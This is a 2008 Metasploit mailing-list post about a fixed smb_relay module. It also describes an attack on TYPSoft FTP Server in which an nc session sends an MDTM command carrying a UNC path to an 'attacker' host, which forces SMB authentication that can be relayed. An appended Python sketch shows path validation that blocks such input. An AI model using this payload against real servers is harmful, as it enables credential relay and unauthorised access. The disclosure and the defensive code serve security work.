Metasploit mailing list archives
smb_relay has been fixed :-)
From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Fri, 19 Dec 2008 22:40:13 +0100
I finally tracked down the bug in smb_relay, the fix has been committed to the 3.2 and 3.3-dev SVN trees. A big thanks to the folks who reported it and their patience waiting on a fix.
Confirmed working. Thanks a lot!

At this point, it would be very nice to have a browse/read/write files payload rather than existing payloads that all expect the user to be local administrator (which is quite uncommon nowadays). A payload that would allow file browsing on a share where the user profile is stored would be of highest interest. But I know this is not something that could be done overnight ...

Bonus smb_relay attack against Typsoft FTP server, which
* runs in the current user session (and not as a service)
* allows unauthenticated use of the MDTM command
* does not properly filter parameters to the CreateFile API

Then:

    $ nc -vv -n 192.168.1.100 21
    (UNKNOWN) [192.168.1.100] 21 (?) open
    220 TYPSoft FTP Server 1.11 ready...
    MDTM \\attacker\whatever

Regards,
- Nicolas RUFF
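Added example, not part of the original message and not code from TYPSoft or Metasploit: a sketch of the argument check the third bullet says is missing, confining a client-supplied FTP path to the server root before it reaches any file API. The names FTP_ROOT, RESERVED and resolve_ftp_path are hypothetical, and the root directory is a constructed value.

```python
from pathlib import PureWindowsPath

# Hypothetical FTP root for this sketch (constructed value).
FTP_ROOT = PureWindowsPath(r"C:\ftproot")
# DOS device names that Win32 resolves regardless of directory or extension.
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {
    f"{dev}{n}" for dev in ("COM", "LPT") for n in range(1, 10)
}


def resolve_ftp_path(arg, cwd="/"):
    """Map a client-supplied FTP path to a local path under FTP_ROOT.

    Returns the PureWindowsPath to open, or None when the argument must be
    rejected before it is handed to a file API such as CreateFile.
    """
    if "\x00" in arg or ":" in arg:
        return None  # NUL truncation, drive letters, alternate data streams
    # Win32 treats '/' and '\' alike, so normalise before inspecting.
    norm = arg.replace("\\", "/")
    if norm.startswith("//"):
        return None  # UNC (\\host\share) and device (\\?\, \\.\) forms
    # Relative arguments are resolved against the session's virtual cwd.
    parts = [] if norm.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in norm.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                return None  # would climb above the FTP root
            parts.pop()
            continue
        if comp.rstrip(". ") != comp:
            return None  # Win32 silently strips trailing dots and spaces
        if comp.split(".")[0].upper() in RESERVED:
            return None  # device name, e.g. NUL or COM1.txt
        parts.append(comp)
    return FTP_ROOT.joinpath(*parts)
```

A server would call this for every path-taking command (MDTM included) and answer with an error reply whenever it returns None.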